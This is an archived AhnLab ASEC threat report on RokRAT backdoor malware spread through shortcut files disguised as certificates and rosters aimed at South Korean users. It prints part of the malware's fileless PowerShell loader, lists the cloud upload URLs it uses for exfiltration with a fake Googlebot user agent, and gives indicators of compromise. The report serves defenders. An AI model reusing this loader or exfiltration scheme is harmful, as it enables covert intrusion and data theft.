LNK File Disguised as Certificate Distributing RokRAT Malware - ASEC By ATCP Published: 2024-04-22 · Archived: 2026-04-05 18:09:58 UTC AhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows: National Information Academy 8th Integrated Course Certificate (Final).lnk Gate access roster 2024.lnk Northeast Project (US Congressional Research Service (CRS Report).lnk Facility list.lnk https://asec.ahnlab.com/en/65076/ Page 1 of 7 The confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type found in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1] posted last year. A notable fact about this type is that it includes legitimate document files, script code, and malicious PE data inside the LNK files. https://asec.ahnlab.com/en/65076/ Page 2 of 7 The simplified operation process of the malware is as shown below. When the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file. https://asec.ahnlab.com/en/65076/ Page 3 of 7 Afterward, it creates 3 files in the %public% folder. The names and features of the files created in this step are as follows. File name Location in LNK File Feature viewer.dat 0x2BC97 (size:0xD9402) Encoded RokRAT malware search.dat 0x105099 (size:0x5AA) Executes viewer.dat file find.bat 0x105643 (size:0x139) Executes search.dat file Table 1. List of created files The first executed item is “find.bat”, which runs “search.dat” via PowerShell. “search.dat” reads the “viewer.dat” file and executes it in a fileless manner. $exePath=$env:public+'\'+'viewer.dat'; $exeFile = Get-Content -path $exePath -encoding byte; [Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072); $k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34 <중략> $byteCount = $exeFile.Length; $buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100); $old = 0; $a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old); https://asec.ahnlab.com/en/65076/ Page 4 of 7 for($i = 0;$i -lt $byteCount;$i++) { [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); }; $handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0); $fried3sd23::WaitForSingleObject($handle, 500 * 1000); The data of “viewer.dat” that is ultimately executed is the RokRAT malware, which is a backdoor-type malware capable of utilizing cloud APIs to collect user information and perform various malicious behaviors at the threat actor’s command. The collected information is transmitted to the threat actor’s cloud server using cloud services such as pCloud, Yandex, and DropBox. At this point, the UserAgent in the request header is disguised as Googlebot, and the cloud URLs used are as follows in the table below. User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Cloud URL Pcloud(Down) https://api.pcloud.com/getfilelink? path=%s&forcedownload=1&skipfilename=1 Pcloud(up) https://api.pcloud.com/uploadfile? path=%s&filename=%s&nopartial=1 Yandex(Down) https://cloud-api.yandex.net/v1/disk/resources/download?path=%s Yandex(up) https://cloud-api.yandex.net/v1/disk/resources/upload? path=%s&overwrite=%s DropBox(Down) https://content.dropboxapi.com/2/files/download DropBox(up) https://content.dropboxapi.com/2/files/upload Table 2. Details on the cloud URLs used The malicious behaviors that can be executed according to the threat actor’s command include: Execution of cmd commands Collection of directory listings Deletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder Collection of Startup folder listings, %APPDATA% folder listings, and recently used file listings Collection of PC information (system information, IP, router information, etc.) Additionally, various other malicious behaviors can be performed, and the collected information is stored in the %TEMP% folder before being uploaded to the threat actor’s cloud server. The email addresses of the threat actor identified during the analysis process are as follows. tanessha.samuel@gmail[.]com https://asec.ahnlab.com/en/65076/ Page 5 of 7 tianling0315@gmail[.]com w.sarah0808@gmail[.]com softpower21cs@gmail[.]com Through its blog, ASEC has been consistently sharing information about the distribution of malicious shortcut file due to the frequent occurrence of such incidents. In particular, malware aimed at individuals associated with Korean unification, military, and education has been continuously identified since the past, highlighting the need for extra caution. [File Detection] Dropper/LNK.S2343 (2024.04.12.03) Trojan/BAT.Runner (2024.04.12.00) Trojan/Script.Generic (2024.04.12.00) Data/BIN.EncPe (2024.04.12.00) Infostealer/Win.Agent.R579429 (2023.05.05.01) MD5 3114a3d092e269128f72cfd34812ddc8 35441efd293d9c9fb4788a3f0b4f2e6b 358122718ba11b3e8bb56340dbe94f51 68386fa9933b2dc5711dffcee0748115 6e5e5ec38454ecf94e723897a42450ea Additional IOCs are available on AhnLab TIP. Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below. https://asec.ahnlab.com/en/65076/ Page 6 of 7 Source: https://asec.ahnlab.com/en/65076/ https://asec.ahnlab.com/en/65076/ Page 7 of 7